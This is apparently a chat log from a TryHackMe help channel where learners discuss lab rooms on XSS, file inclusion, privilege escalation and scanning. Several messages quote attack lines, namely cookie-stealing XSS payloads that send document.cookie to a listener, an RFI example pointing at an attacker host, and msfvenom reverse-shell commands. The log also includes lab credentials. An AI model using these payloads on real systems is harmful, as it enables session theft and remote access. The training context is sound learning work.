#junior-pentester-path
In Linux fundamentals part 3 / task 4 / 3rd question, I'm trying to download a file with wget but I have this message: failed: connection refused. I made sure that wget is filled with the right URL and /.txt, but it is still the same.
Are you not missing . [Dot] before flag.txt
hi, no, I checked and wrote like that: wget http://10.10.82.234:8000/.flag.txt
No?
I mean you aren't typing dot
. Dot represents hidden files in the Linux file system
I typed it: 8000/.flag.txt
Are you able to ping your target machine?
It's a little bit weird
Did you set up the python server?
It didn't work with 10.10.82.234:8000
In some cases, target machine takes time to load
You still need to set up a python server.
It's the target machine and I think he can't set it up
Otherwise he would be able to directly get the flag
You ssh in to the machine, set up the python server, on the attackbox download with wget.
I see
Get it
You are right
Got it now?
I'm trying right now
Hi all. I'm doing the Windows Priv Escalation but the connected machine keeps losing connection to my OpenVPN session. Any ideas??
I'm trying with ssh as you advised but the permission is denied now. I haven't changed the password that I've used before
You don't need to change any password.
ssh tryhackme@10.10.82.234
password is tryhackme
I think I can't set up a python server on the target machine of the attack box
It worked for me. I was just able to get the file
So you got it?
I'm just going to find and open that file
It should download where you entered the wget command.
Thank you for your help, Scrubs. I could manage it thanks to you.
type flag.txt
used more
multi-posting your questions is rude to the people who try to help
sorry
Hi, I am in Authentication Bypass, task 3 Brute Force, the command works but it doesn't display the password
Check your valid usernames file, it's not supposed to hold any other data like size, status etc.
There are only names in nano valid_usernames.txt
Maybe the formatting of the file is wrong, I suggest creating a new file from scratch with touch newfile and then manually writing the usernames in it, 1 username per line
Thank you, it worked
Why is the second field (search field) not showing?
Hello
Hi everyone
A little stuck in the room Internal.
I can modify the WordPress and get a shell, but after that I'm stuck.
LinEnum gives some interesting information, but is there any way to switch to user XXX?
Do you have any suggestions?
yes get it
sorry
I posted my message in another
I'm doing the Nessus Room - I hit the problem that many seem to run into, where I installed Nessus on my Win 10 machine and it can't hit the target IP when I do it for some reason.
I am installing Nessus on my Kali Linux VM - how long should this take? My VM has 8MB RAM and 60 GB HD allocated. Should this be taking a long time to install?
8 MB
Got that on the VM - it's just REALLY dragging on the install - still compiling plugins
hope you mean 8 GB not 8 MB
LOL 8GB
as 8MB is too little for a Kali VM
Yes, you are correct- 8GB
by a factor of magnitude
Mine has 4.3 GB
Also, Nessus itself takes up 30 GB of space
Hahahaha!
My Dual P2 400's might have been happy with 8MB RAM!
so that will tell you a lot
Which part of the install are you at?
nessus is installed - trying to get the OpenVPN installed now
Did you set up an account with Nessus?
yah that part is done
just trying to connect my kali linux to tryhackme via openvpn
Which country are you in?
Either something is blocking your VPN, ( could be your country ) or your Date/Time is wrong on your Kali box.
Could also be something blocking the port used, or your ISP is blocking the traffic.
US
date/time is fine
let me try another refresh from the VPN
er VPN config file
Maybe because I didn't choose the VIP option
That won't be an issue
When in doubt.... have you tried to turn it off and on again?
One thing I like about this is that it's a hell of a lot more practical than just dithering around with the Linux CLI --- WHY am I renaming stuff etc etc?
I'm a junior
Hey guys, I'm having issues with Windows Privilege Escalation task 5
I've set up the msfvenom payload and I'm serving an HTTP server
but on the Windows target machine, when I'm doing wget, I can't seem to connect
wget : Unable to connect to the remote server
What's your full command
And a screenshot of your http server?
Oh wait, nvm, I forgot that the thing crashed before I took a break and rebooted it. New attacker IP works
sorry
Holy sht, I just learned something new that I've been saying wrong for years by doing the Windows Fundamentals. UAC: I thought the A stood for Access and it's Account. Sad (25 year Windows Engineer)
Does the Jr Pentest Path - Network Services (Enumerating Telnet) nmap scan really take a long time?
Finally finished
Congratulations!
I am working on cross-site scripting, task 8. I entered the <script> code in the inspector as I did for the previous tasks. But it is greyed and hence I can't see the string THM. <textarea> was ended, so the text does appear outside of the area.
Congratz! I finally finished yesterday as well
I'm not quite sure where to move on now
Is the next suggested step to dive right into the "Offensive Pentesting" path?
Learning the red part mostly. I thought I saw a pathways diagram that illustrated the next steps after the "junior" courses, but I can't find it anymore, so I probably just imagined it
Yeah, I know about the rooms; actually there are several tabs in my browser with open room pages. Maybe it's time I get back to those, you're right
I see, yeah there's so much stuff, I'll dive into some more of that
thanks @steel nymph
Gave +1 Rep to @steel nymph
I finished the Linux Fundamentals rooms and Linux Strength Training, and I have experience in programming and networking
Where should I go from here?
If you want to stick to paths:
If you want shadow's recommendations, it is in this order:
#pre-security-legacy-path
#974406074444685322
#junior-pentester-path
#pentest-plus-path
#web-fundamentals-path
#offensive-pentesting-path
#791764435991658556
If you want to do other stuff, check the modules
ty
of course the network rooms are different too
Royal salutations to all
Is the netsecchallenge room meant to take a long time to scan? I've been using this command for the 2nd question to find the port over 10,000 ||nmap -sS -sV -p10000-65000 10.10.79.171|| and have been waiting for a while now
got it working after a significant time
For future reference, when using nmap against THM machines you tend to be able to change the timing of the nmap scan using -T4 or -T5
Yeah, tried that and didn't wait long enough so I thought something was wrong, but good to know that now
I was in Authentication Bypass trying to do a lab, then suddenly I got this error: stat/usr/share/wordlists/Seclists/Usernames/Names/names.txt : no such directory exists
Maybe I don't have wordlists already installed in my attackbox?
Or perhaps they are in a different place
So what should I do? Got a little confused now
That's what I get as an error: stat /usr
Yes i am
I am using attackbox
Okay wait
You know what, maybe there was some typo. I tried to check the path first, then tried it again and it worked
Alright, I must be missing something here. File Inclusion Task #4, Part 2... I have the correct input which outputs "File Content Preview of ../../../../etc/passwd" along with a printout with various directories. I do not see an answer to "In Lab #2, what is the directory specified in the include function?" - Any info would be helpful.
Warning: include([redacted answer]/../../../etc/foo) - Thanks.
Hi, so I finished Introduction to Cyber Security and Pre Security recently. Do I have the necessary knowledge to delve into Jr Pen Test?
Ok thx!
What is a probe in nmap, in simple terms?
"test" or "try out"
Who knows the Pass-the-Hack attack?
Pass the hash?
yep
Lots of people. Ask your question directly. Is it related to a room on this tryhackme learning path?
yes in privesc
Ok. Please ask your question directly. If someone can help, they'll help.
Hello,
Wondering if you could give me a hand. Probably it's something really silly that's happening, but it's triggering me already
I'm on Linux PrivEsc on the task 11 - Privilege Escalation NFS
I shared the file with the victim machine through the share and it seems to run but not giving me root shell.
From the attacker machine:
See? It had to be something silly. Starting the machine again and checking.. Thanks!
Gave +1 Rep to @steel nymph
Thanks !!
Gave +1 Rep to @steel nymph
Hi
Hi
Any chance I could get someone to help me on "walking an application"?
Ask.
Gave +1 Rep to @rustic totem
Thank you. I'm not sure how much context you need, so I'll copy-paste the exact description of this particular flag: External files such as CSS, JavaScript and Images can be included using the HTML code. In this example, you'll notice that these files are all stored in the same directory. If you view this directory in your web browser, there is a configuration error. What should be displayed is either a blank page or a 403 Forbidden page with an error stating you don't have access to the directory. Instead, the directory listing feature has been enabled, which in fact, lists every file in the directory. Sometimes this isn't an issue, and all the files in the directory are safe to be viewed by the public, but in some instances, backup files, source code or other confidential information could be stored here. In this instance, we get a flag in the flag.txt file. I can see the directory I assume it's talking about, called assets, via inspect element / debugger sources, but all I see is 3 JS files
Gave +1 Rep to @rustic totem
Check that assets directory through your web browser
I'm not sure how
Replace machineip with your target ip
got it thank you
Gave +1 Rep to @rustic totem
Since Friday I have been getting this error msg when I try anything with Firefox, what's the matter? I thought it was a temporary server issue but days later... Am I the only one seeing that or is it a general issue?
Did you press the big green start machine button?
Yes of course, can we start the attackbox without first starting the machine? Never tried but I don't think so. I repeat, yes I started the machine
What's the machine IP that you see then?
10.10.38.80
really?
So the issue is on my side then...
If you're not connected to the OpenVPN, open the link in the attackbox
for copy pasting into the attackbox
Hi, I have a problem in Authentication Bypass, Task 5 Cookie Tampering, I can't log in as admin, even though I have put the correct code
Has anyone had trouble getting netcat to work on the XSS Blind module?
Try using the attackbox as that part doesn't work with OpenVPN IIRC
I'll give that a go
and just to be sure, I point netcat to listen on the target machine IP, right?
No? You listen on your attackbox/THM IP which you've used in the XSS payload
Okay cool, got past this one
thanks
idk why it doesn't work outside of the attackbox
Hi guys. Please, how can I access an Ubuntu 20.04 machine without the username and password?
Is this related to the content on the path?
It's not on THM. It's just my personal study
This channel is for the path on tryhackme.
There are also way too many variables to answer your question...
Was suffering with RDP, only this helped T_T thanks
Gave +1 Rep to @shadow echo
Morning all, I have almost finished this path but have a question about web app pen testing that I cannot get the answer to in any of the rooms. During the pen test of a website, the client provides the URL / domain name of the website which they want to be pen tested. However, the underlying webserver has an IP address that the URL / domain maps to, does this mean as pen testers we are allowed to pen test the underlying webserver IP address? I ask this because, other customers will of course be using the underlying webserver, meaning an exploit on the underlying webserver could impact all customers sharing the IP address of the underlying webserver. A lot of the rooms say to scan the IP address of the webserver with nmap, then attack open / vulnerable ports. This is fine if the webserver is hosted internally by the customer, but what if the webserver is owned by the likes of GoDaddy and is shared by thousands of customers? Surely we would not be allowed to pen test it? Thank you
I am getting this error in the Walking an Application module where I am not able to access https://lab_web_url.p.thmlabs.com/ which should take me to the ACME IT Support. Please help
Hello, is there any way to get coupons from tryhackme by completing the Jr penetration tester path?
I see, so if I as the pen tester cannot get approval from the hosting company, I cannot test the underlying webserver? I can still test the URL / domain though yeah? I think Plesk is the hosting company, will they even respond to me if I ask them the question?
It is more of a general question to be honest, won't be randomly attacking websites
Hello, in the SQL injection room, in task 8 "SQL bind", why, when you are looking for the name of the table, do you find the word 'analytics_' when in fact the name of the table is 'users'?
ok, I thought that since this is a laboratory, there should only be one table
You can't attack the URL/domain, because that's not how it works. You'd be attacking applications or systems at those URLs or on that domain, which may be under that hosting company.
But I am on here for help! Can't you explain to me please? Why am I incorrect? I genuinely don't understand...
I'm not testing 1.1.1.1
Do I need to hope def.com also wants testing?
I get that
but def.com has nothing to do with it
they don't know who we are
no mention of any of this on TryHackMe
about scoping and having to speak to the web host
I get it for testing the underlying server
no I am not
I am learning!!
and asking questions
that are not clear to me
If you slow down abc, it's likely to hit def
thank you
Gave +1 Rep to @steel nymph
Hi again all, quite tricky to explain this. My mate owns a website and he is happy for me to "play about" and practice my pen testing skills. In the THM rooms, the search feature on a vulnerable website is often used for the teaching / learning of injection techniques, for example if a user is able to search a website for an item, the searched for item appears in the URL as www.websitename/search?search=1 meaning I can easily manipulate the ?search=1 key / value pair. However, out in the wild (on my mate's website) I am not seeing this. For example, the website does have a search feature, but when I type something to search for, the URL changes to www.websitename/search but does not show the key / value pair in the URL. This means I cannot manipulate it. I have used Burp to intercept the http request but still cannot see the key / value pair. Hope this makes sense? Thank you.
And by "happy for you to play about" you mean he gave you verbal permission to poke around?
Unless you have a legal contract, don't do it.
thanks everyone
Having an issue with Authentication Bypass, Brute Force module. I type in the command and it does not give me an output. I've looked at the command over and over again and I'm not catching any errors.... any ideas?
I will insert a screenshot of my command
!docs verify
so that you can send said screenshot
You are filtering out all the 200 OK HTTP responses
Have you tried using -fs or -fw?
@sage current I will try this
Although on the website it literally says to filter out status code 200
Okay then, weirdness
Yeah, the command works, it just does not give me any results
Oh well, found the answer on a YouTube video, just kind of frustrated I couldn't get the command to work for myself
There is no error
and that file just has a username on each line
There are 4 total
Shut everything down and now I'm trying again. I will paste a screenshot of the results I get when entering the command exactly as shown on the site
Even had my girlfriend come over and type out the command, same result
The URL should have /FUZZ at the end
Hi! In the file inclusion module, under Task #8 (Challenge) for the last challenge (RCE in Lab #Playground) what remote server should be used in the URL?
But attacking machine is where we enter the URL. So we enter 127.0.0.1 itself in the URL?
Wait. But I access my target application from the attack machine. That's the only machine I have.
So I get this - Please visit the link http://10.10.223.100/
So I access this URL from the target machine. I don't have any other machine.
That's exactly what I am saying. I access my target machine from my attacking machine. So basically for the remote server IP I have to enter 127.0.0.1, right?
Okay. Wait. Let me give you an example.
So a typical RFI looks like this:
http://example.com/?file=http://attacker.example.com/evil.php
Here example.com will be my target server. And attacker.example.com will be my attacking machine, right?
Okay so since I am accessing this from my attacking machine, this will be - http://example.com/?file=http://127.0.0.1/evil.php
Am I right?
127.0.0.1 is the local machine.
Okay. Thanks. Let me do something different. Thanks for your help though.
Hey guys! I am actually going through the junior Pentester path. If anyone wants to collaborate for a bit over voice chat we can work it together. I could also join another program.
I'm working on task 12 of content discovery where it wants you to use the wordlist and one of the automation tools. When I try them it says no such file or directory exists for it. Any suggestions?
It won't let me send a screenshot
sorry wrong screenshot. Was trying different directories give me a sec
I have been using it for other paths since the beginning and it always went well, did you change the rules recently?
No, it's been like that for months, if not years.
What's the file path for task 4 in the local file inclusion room?
Mh?
The question in the room is telling you what file they want you to read?
Actually I'm confused about how to solve this question
Like, it's asking what's the request URI for /etc/passwd
If you are making a request to 10.10.10.10/index.php?lang=EN.php they are asking for the /index.php?lang=EN.php part
ok let me try
Btw, EN.php is also just a file that's getting included with that request, if that helps
For lab#1 I'm putting index.php?lang=/etc/passwd but it's showing an error
If you'd like help with an error, please show us the error
Hi, can I get some help on the intro to shells room? Can't seem to make RDP work
Sure.... what RDP program are you trying to use???
Found the solution already. Anyway, thanks!
Gave +1 Rep to @sage current
no problem... keep enjoying your learning journey
Hi! I'm trying to understand the main difference between Local File Inclusion and the Directory Traversal vulnerability and I was wondering if anyone can help me to solve my doubt.
I will start by saying that I understand the purpose of both mechanisms, but I don't fully understand what the difference between them is.
-
First, Directory Traversal is a vulnerability that gives a user the ability to read unauthorized files or documents on the server by modifying a parameter in a GET request that includes a file, such as: http://web.com/page?image=1.png
-
On the other hand, LFI does the same, but the TryHackMe page insists on the fact that the user's input is used in a file inclusion instruction like "include", "require", etc. (in a PHP-based web server), letting us see the contents of any file in the system if there isn't any validation of our input.
My question is why do both methods lead to different results to the point of being considered different vulnerabilities? And what can I do through LFI that I couldn't through Directory Traversal and why? Thanks and regards!
I understand, if my input doesn't pass through an include() function I will not be able to execute a PHP file that I previously uploaded to the server. Is that it?
Thanks
The shell room is so hard to understand
the practice and examples
I uploaded some webshells to /uploads
one I copied from task 11 webshells and one that was on the machine inside /usr/share/webshells
I tried to URL encode and put that command in the URL after ?cmd=
the one under active machine information on top of the TryHackMe page tasks
I tried it with the attackbox IP also
It probably works, I just don't understand anything I'm doing
:D
:OO thanks
Hi, I was solving the Challenge section in the File Inclusion part of the Introduction to Web Hacking chapter and I'm kind of stuck at the moment.
I'm trying to solve challenge 2 and I don't know what I'm supposed to do. The challenge's page displays a message: "This page is only for admins". Thus, I go to the Storage section (DevTools) and I change the value of the THM cookie from "Guest" to "admin" and the message from the page changes: "Welcome admin! This is a admin web page! Get the flag!" and "Include a file in the input form below" but there isn't an input form and I don't know how to retrieve the flag /etc/flag2.
I tried to add a GET parameter in the URL in many ways and I used the curl command to send a POST with a file parameter too but it doesn't work either. Any ideas? Thanks!
Sorry
I modify the THM cookie
and I realize that the content of the page changes depending on the value of said cookie. The lab is then resolved by including the correct cookie value to retrieve the flag. Regards!
Thanks
Hi all. I'm working on the Junior Pen Test path, and am on Burp Suite: Repeater, Task 6 Practical Example. The task is to add FlagAuthorised: True via Repeater, which I've added and sent, but a flag is not showing up in the returned page or source code. What might I be missing? Thanks in advance!
Have you looked in the Burp response tab?
Linux PrivEsc task 12 because it does not allow to connect via SSH?
it tells me "segmentation fault"
ok
So I am working with Burp Suite trying to craft a request that causes an HTTP 500 error. I can't quite seem to get it to go correctly. I have tried using symbols, large numbers, random strings of text
Anything I am missing?
this is on the /product line
Yeah, the negative or equal to zero seems interesting, but how would I go about crafting that request?
I'm currently doing /products<insert whatever here>
wait
I just figured it out
Syntax problem
LOL
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Hi, this command doesn't seem to work on my Kali, any help?
I already did what you told me, now what?
Hope everyone's day is well. I am struggling with the Burp Suite Intruder Bonus optional questions.
Use Intruder to automate the column enumeration of the Union SQLi in the Repeater Extra Mile exercise.
So far I have looked back at the SQLi injection room and see how to enumerate columns, but I'm not sure how I would even begin the process of automating it using Intruder
I know I need to capture a request to *active machine ip*/about and send it to Intruder. My position will be the end portion of the path in the HTTP request
and my attack type will be sniper, but I'm not sure where to go from there
Hi, can anyone help me with authentication bypass, cookies tampering?
Wish I could. Just started that module
Ok, thanks, let me know then, when you will remember
What do you need help with?
When I type : curl -H "Cookie: logged_in=true; admin=true" http://10.10.24.205/cookie-test then I am still logged in as a user and no flag appears
?
Attackbox
Attackbox
thanks, I have verified but am able to attach things only in bot messages
Thing
I am not sure where to paste the token
Super thanks
Am waiting for the machine to start to make the screenshot
Hello there folks, I am working my way through https://tryhackme.com/room/fileinc
I am on the challenge section. Question 2 asks for the contents of /etc/flag2. The hint suggests looking at the cookies, but on inspection in FF and Chrome I see that the site cookies are empty. I have tried using curl -c also but I'm not having much luck. I've done a search here and I see that people are having luck finding cookie data.
Can someone point me in the right direction to viewing the cookies for this one ?
I'm not sure I'm accessing /challenges/chall1.php
Thanks for taking the time to point that out @steel nymph it's much appreciated. I'm guessing there's a few loose marbles rolling about my skull today.
Gave +1 Rep to @steel nymph
Is there a tool equivalent to Postman/Insomnia that comes OOB with Kali?
If I have a listener on the target machine and connect to it from my machine, that is a reverse shell; is a bind shell using those same commands but the opposite, by listening on my own machine?
Thanks again, I was thinking maybe burp or something would do the task. I'll keep looking into it
Okay, but do I use the same 2 listening and connect commands in both cases?
I have read it, am on task 13 practice and examples
Am I supposed to put the attackbox IP or my tun0 IP? Because in one place it says one and in another place it says the other
No, I just click the green start machine button and the blue start attackbox button
in the room
You gotta understand how a reverse shell works
I think I know it
I connected to the OpenVPN connect thing which gives me the tun0 address. is that supposed to be the same as the attackbox ??
and do you like to be bombarded with questions or should I try not to?
No, it's not supposed to be the same
Oh, so he meant I could use any of them
I don't know, I tried to play King of the Hill the other day and couldn't open the site, so I followed some instructions I found on the TryHackMe page which led me to this
am not
For the final question in the file inclusion Challenge. I have tried ||Uploading a file to github gists|| in order to ||include it as a remote file inclusion|| it seems however that when connected to the THM VPN I do not have access to the internet at large, a full tunnel perhaps.
Am I barking up the wrong tree or just barking mad ?
ahh, I am indeed doing that
Am I on the right track that the challenge expects me to ||upload a file to my own file server?||
I tried using python3 -m http.server --bind 127.0.0.1 8000 but I do not have access to that in this context. (I suspected that I would not have anyway to access a locally hosted file from the browser context in this challenge). Sorry for my lack of correct terminology
I thought as much. I guess I was under the impression otherwise I would have to open up ports on my router etc
Really appreciate the patience, I'll give it another blast.
In XSS "Task 8 Practical Example (Blind XSS)"
The payload for the blind XSS is ||</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>||
How come the XSS polyglot doesn't work here ?
Are you doing it from the attackbox or from your own attack VM???
I'm doing it from the attackbox. The escaped text area and script seem to work fine this is my polyglot string ||jaVasCript:/-//*\/'/"/%0A%0a/(/* */oNcliCk=fetch('http://ip:9001?cookie=' + btoa(document.cookie) ) )//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3ciframe/<iframe/oNloAd=fetch('http://ip:9001?cookie=' + btoa(document.cookie) )//>\x3e||
I was testing it. I have the mental model that it is a sort of catch-all XSS methodology
I'm a JS dev in my day job and I've never seen anything like it. Maybe some sort of super funky bookmarklet.
I guess that means I don't know why it didn't work. And I have a very rough idea why it would work in other scenarios.
The previous tutorial suggested that the polyglot would have worked in all the other example levels. Now I'm left scratching my head as to why it doesn't work in this blind XSS example.
I'm looking at the source. I thought the polyglot was a way to ensure that js would be run in all circumstances. Escaping everything that needs escaped and ending in a fallback iframe onload ?
My assumption was that I had made an error in the polyglot code.
I can appreciate that. I thought that in the case of being inside a text area it would be the fine string :p
For example :
<textarea>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</textarea>
Got it working. It was encoding the spaces in my code (as it should I guess >,<)
problematic partial ||<sVg/oNloAd=fetch('http://ip:9001?cookie=' + btoa(document.cookie) )//>\x3e||
rendered as ||<svg onload="fetch('http://ip:9001?cookie='" +="" btoa(document.cookie)="" )=""></svg>||
working partial: ||<sVg/oNloAd=fetch('http://ip:9001?cookie='+btoa(document.cookie))//>||
rendered as ||<svg onload="fetch('http://ip:9001?cookie='+btoa(document.cookie))//">\x3e</svg>||
Linux PrivEsc:Privilege Escalation:NFS
$ cd /home/backup
$ ls
nfs nfs.c
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
$ ls -l
total 28
-rwsrwsrwx 1 root root 20680 Aug 18 02:42 nfs
-rwxrwxrwx 1 root root 116 Aug 18 02:42 nfs.c
Anybody have an idea on this error on the box for this exercise that won't let me run ./nfs?
You most likely compiled the nfs.c on a machine with a GLIBC version that's not compatible with the one on the target machine.
Compile it on the attackbox, iirc that one should work on the target machine then
Hey everyone,
I'm almost done with the Jr Penetration Tester path and I was wondering how I should continue my journey from here. I thought about finishing the Offensive Security path after this one. I have also finished the Complete Beginner path and have some knowledge of the penetration test process and networking. What do you think?
Thank you
I feel dumb for asking, but how do I copy/paste from MY browser to the VNC attack box? I can go from VNC to my browser, but not the other way around
There is a clipboard where you can paste your copy from the browser to the attack box (left hand side of the attackbox)
I believe you're onto something here
$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9.1) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
VS
$ ldd --version
ldd (GNU libc) 2.36
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
I will try it from the attackbox rather than my machine. Would there ever be a real life scenario where I would have to downgrade a compiler to overcome such events in a real pentest?
GLIBC is a library that is being used by the compiler.
I would say yes regarding a "real pentest", but maybe someone else can give you a more reliable answer to that one.
Types of Security Controls:
- Preventive, Detective, Deterrent, Recovery, Compensation
Is this correct?
My college teacher has taught me this, but when I search it online there are just three types (of control functions): preventive, detective and corrective. So which one is correct?
Ask your college teacher.
Why do you have to sound so rough man, I'm just asking. My teacher might get angry because I'll be questioning his knowledge you know

It's their job to teach you.
For all I know, you could be doing a test right now and you're cheating, which is against the rules of this server
No sir, not at all if that would have been the case then I would have thought of time too, tests have time limits you know.
A test online can be done in 5-10 min(s) and this could be your last question.
I didn't buy a subscription to cheat. I bought this so I can be a good scorer
No seriously it isn't
You don't need a sub to be in the server.:)
But seriously, when it comes to learning, your first port of call should be your teacher.
Explain what you don't understand.
This is a theory part so maybe it's a little boring but crucial too. So in this article, it says that security control functions are of three types, but according to what my teacher taught me there are five types (preventive, detective, deterrent, recovery, compensating). So which one should I consider correct?
Thank you in advance for being a helper.
Gave +1 Rep to @remote iris
Question on the file inclusion room: In the first couple of questions we exploit the include PHP function for path traversal and it is obvious from the lab that it is using this function (by the warning shown on the page).
But in a real case scenario, how would one find out that a webpage is using this function?
How do I catch the shell with multi/handler? I have it ready here, but the guy on YouTube double-clicked the shell.exe and then it caught it; when I do it, I get "this app can't run on your PC".
msfvenom -p windows/x64/meterpreter_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
idk
Makes sense, thanks lassi!
Gave +1 Rep to @steel nymph
Apparently I can't make a 32-bit payload.
The problem wasn't the 32-bit part; I just had to double-click from here and it works, but double-clicking from the desktop does not work.
So my shell1.exe worked now.
Hello guys, I've got a problem in the Authentication Bypass room, on task 2: "Website error messages are great resources for collating this information to build our list of valid usernames. We have a form to create a new user account if we go to the Acme IT Support website (http://MACHINE_IP/customers/signup) signup page." That link is supposed to be the machine IP, but it's not working for me.
try to refresh your page
ctrl + F5
Got it! I had to go back to task 1 and start the machine. Thanks m8
Gave +1 Rep to @plush herald
Is there a bug in the Windows Privilege Escalation room with the unquoted service path technique for task 5 question 2? I'm running into this....
I've tried two methods. One being directly from the module:
||msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe||
And the other:
||msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.110.36 LPORT=7777 -e x86/shikata_ga_nai -f exe -o Disk.exe||
The outcome of the screenshot above is from the second.
nc -lvnp 7777
Yeah, I'm RDP'd into the machine as we speak.
I re-created the payload using exe-service, and now it just goes to this which is the same issue I was having last night.
it's not.
I can get other reverse shells on this box, just not this one using the unquoted service path technique.
I am RDP'd into the Windows machine using xfreerdp in my Kali VM.
This same error has occurred two separate days after machine restarts.
k.
well, changing port and removing encoding worked.
thanks
Gave +1 Rep to @steel nymph
hi
The XSS room, task 8, on the blind XSS practice.
My payload got blocked.
How do I solve this?
What was your payload?
</textarea><script>fetch('http://10.10.80.197:9001?cookie=' + btoa(document.cookie) );</script>
Is 10.10.80.197 your attackbox, or the target IP?
attackbox
That should work.
Can you DM me your attackbox URL?
In fact, no, what is your target IP?
Ok, give me a few min(s) so I can do it in my VM.
Do you have nc set up just now?
Then I clicked the id number.
You don't need to click the id number, you just wait.
Oh, I mean this id number in the red box.
@remote iris can I have a look at the network panel of the payload?
It won't go there, it will go to your terminal that is listening.
I think it went wrong with my network.
My local Kali VM doesn't work,
but the online Kali attackbox works.

The Kali VM should connect to the LAN with the OpenVPN command,
but it doesn't.
Why?
I'm not sure, I never really asked Tim about it, because my tun0 works with the room.
You're welcome.
Hey, can someone please recommend me a great comprehensive course on networking on Udemy? I really need to learn it; it seems it is a must to have a good understanding of it as a security person. So please help me. I would really appreciate your help.
Nobody happens to have any idea on this?
@remote iris Man, can you please help me here? Please, I would really appreciate it.
I don't know any courses on Udemy that are decent, nevermind good.
Oh, I see.
If you want to learn networking, I suggest going to the Palo Alto website and learning there.
it's free
The site's UI is a little confusing. Thanks though.
Gave +1 Rep to @plush herald
Helpful hint.
If you want to hide your name, also delete that THM-xxxxxxx
In the bottom right hand corner, we can use that to view your cert.
Does this mean if I have RW on the Startup container then I will also have RW on any sub container inside Startup container?
Hey, can somebody help me with a scanning-related question? In a port scanning result, when a port is found to be open and unfiltered as well, does that mean that port is one of the most vulnerable ports and easy to attack? I am assuming that unfiltered means no firewall restriction is applied.
No, it doesn't mean that. All it means is that port is open and you can complete the TCP handshake.
Your assumption is... Mostly correct? It means the firewall didn't stop you
If it's filtered in nmap, it means nmap didn't get a response
yeah, because there was a firewall, right? or something else?
Could be a firewall. Could be the host is down. Could be some traffic got lost.
You can't say for certain anything except "it didn't get a response"
Okay, got it, thanks for clearing the doubt so well.
Gave +1 Rep to @idle bison
Hi. On Privilege Escalation, Windows Privilege Escalation, Task 7, To change "Druva_inSync_exploit.txt", we need an administrator privilege. That privilege is the end goal of the task. Since I can't save the changes, I can't get the admin privilege to get the flag. HELP PLEASE!
How would you tell nmap to scan all ports?
I have tried going through the manual page to find the answer for this one five to 7 times by now, but I still can't find the answer, so can somebody please help me?
-p-
Thanks
Gave +1 Rep to @turbid crow
I see that now, it's present in the long text explanation.
Yeah, that's what I thought and now I'll do that. It consumes too much time too.
man nmap | grep ports can also work, although you might need to fiddle with grep's context settings
Thanks, I'll look into it too.
Gave +1 Rep to @alpine barn
I was doing the thingy where I opened up the machine for Hacking Web Application, Walking on the Web thingy and it told me to type a url, I tried but nothing happened.
Please be more accurate on the explanation of your issue, add a link to the room, what task you are talking about, etc.
With "I was doing the thingy" it's hard to help
Aye aye.
Tell me you're Scottish, without telling me you're Scottish. xD
Haha, being Scottish would be cool, but I just type interestingly…
Hello friends. Faced a problem in the room Linux PrivEsc
Task 9 (Cron jobs)
Looks like cron doesn't work (though systemctl says it's active)
I added a line to backup.sh:
echo `date` > /tmp/date
and the file /tmp/date is not created. It doesn't matter how long you wait, 1 or 10 mins.
Thanks for your help, friend. The file was correct, but for some reason it lacks x permissions after the machine started.
Gave +1 Rep to @steel nymph
I'm doing the task 2 from Metasploit Exploitation. I set username to penny. I set the path to the /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt I also set RHOST correctly and also set it to stop on success. It's been running for 30 minutes trying all the passwords. Is this normal?
(445 is the port)
Can you show the options?
!docs verify
verify first to send ss
ok I should be verified
for now not yet
Ahh i see just a sec
ok done
crap I see it
duh
the SMBpass I set the file...rofl
got it
password found in like 5 seconds
Sometimes you find the answer yourself as soon as you ask the question.
that's the rule
Where can I find the root password of my attackbox?
I tried to run Remmina and it asked for the root password even though I was the root user.
https://tryhackme.com/my-machine
Try that.
That link will give you the credentials for your attackbox.
Thank you. The problem is that with sudo it asks me for my password before starting Remmina, and without sudo Remmina asks me for the password. I'll try the solution suggested by scrubz and let you know if it worked.
Gave +1 Rep to @fair hill
Thank you, I'll let you know if it works.
Hi! I was wondering if somebody can explain to me how the MAC spoofing operation is technically possible. Let me explain: I am aware of how IP spoofing works, the content of the "source" field of the IP header of a (for example) TCP/IP packet has to be changed. What is the analogous process in the MAC spoofing that Nmap does for us? Regards!
You change the MAC address in the data link layer but keep the IP in the transport layer the same as your actual one.
And what does this look like from the perspective of the TCP/IP packet? I mean, the same as in IP spoofing where I change the "source" field, is there a source field in a MAC header or something?
Thanks for answering π
Yeah, there is a source and destination field in the data link layer for MAC addresses.
Check out the new Wireshark: The Basics and Wireshark: Packet Operations rooms; you can look at some frames to see how network traffic looks in general.
Thanks a lot, I will look at that!! :):)
+rep @sage current
Gave +1 Rep to @sage current
wait wut why robert???
For the help up there that robocop didn't get you for
Surprisingly, those credentials did not work with Remmina; it was asking for something like a keyring password for root.
Oh yeah, that's a known issue. I'm not sure what the creds are, but clicking "cancel" makes the box go away, it'll just keep popping up. (Either that or use xfreerdp)
xfreerdp for the win
I forgot what I used, but not Remmina or xfreerdp. I think I had downloaded something from apt that I found as the 2nd suggestion from Google. Thanks for the help.
Gave +1 Rep to @alpine barn
Fair enough, I try to recommend the things that are pre-installed, as free users don't have internet access to easily install things on the attackbox, but if it worked it worked.
